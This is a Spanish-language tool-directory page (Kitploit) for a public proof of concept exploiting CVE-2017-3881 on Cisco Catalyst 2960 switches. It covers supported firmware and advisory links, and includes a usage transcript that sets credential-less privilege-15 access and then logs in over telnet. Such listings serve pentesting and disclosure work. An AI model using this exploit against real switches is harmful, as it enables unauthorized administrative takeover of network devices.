Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cisco-rce — CVE-2017-3881 Cisco Catalyst Ejecución Remota de Código PoC | Kitploit
Herramientas/GitHubGitHub/artkond/cisco-rce
Seguridad de Sistemas EmbebidosFrameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de Penetración
GitHubartkond/cisco-rce

cisco-rce

CVE-2017-3881 Cisco Catalyst Ejecución Remota de Código PoC

Ver Repositorio
21379hace 9 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-3881 Ejecución remota de código en Cisco IOS

Este repositorio contiene código de Prueba de Concepto para explotar la vulnerabilidad de ejecución remota de código divulgada por Cisco Systems el 17 de marzo de 2017 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

Descripción

El análisis del exploit está disponible aquí - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

El código del exploit RCE está disponible para el switch Cisco Catalyst 2960. Este exploit depende del firmware. Se admiten dos versiones de firmware:

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

El código de denegación de servicio está disponible como módulo Ruby de Metasploit. Esto debería funcionar para la mayoría de los switches mencionados en el aviso de Cisco (se necesita confirmación).

Ejemplo de uso

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

Autor

Artem Kondratenko https://twitter.com/artkond

Descargar herramienta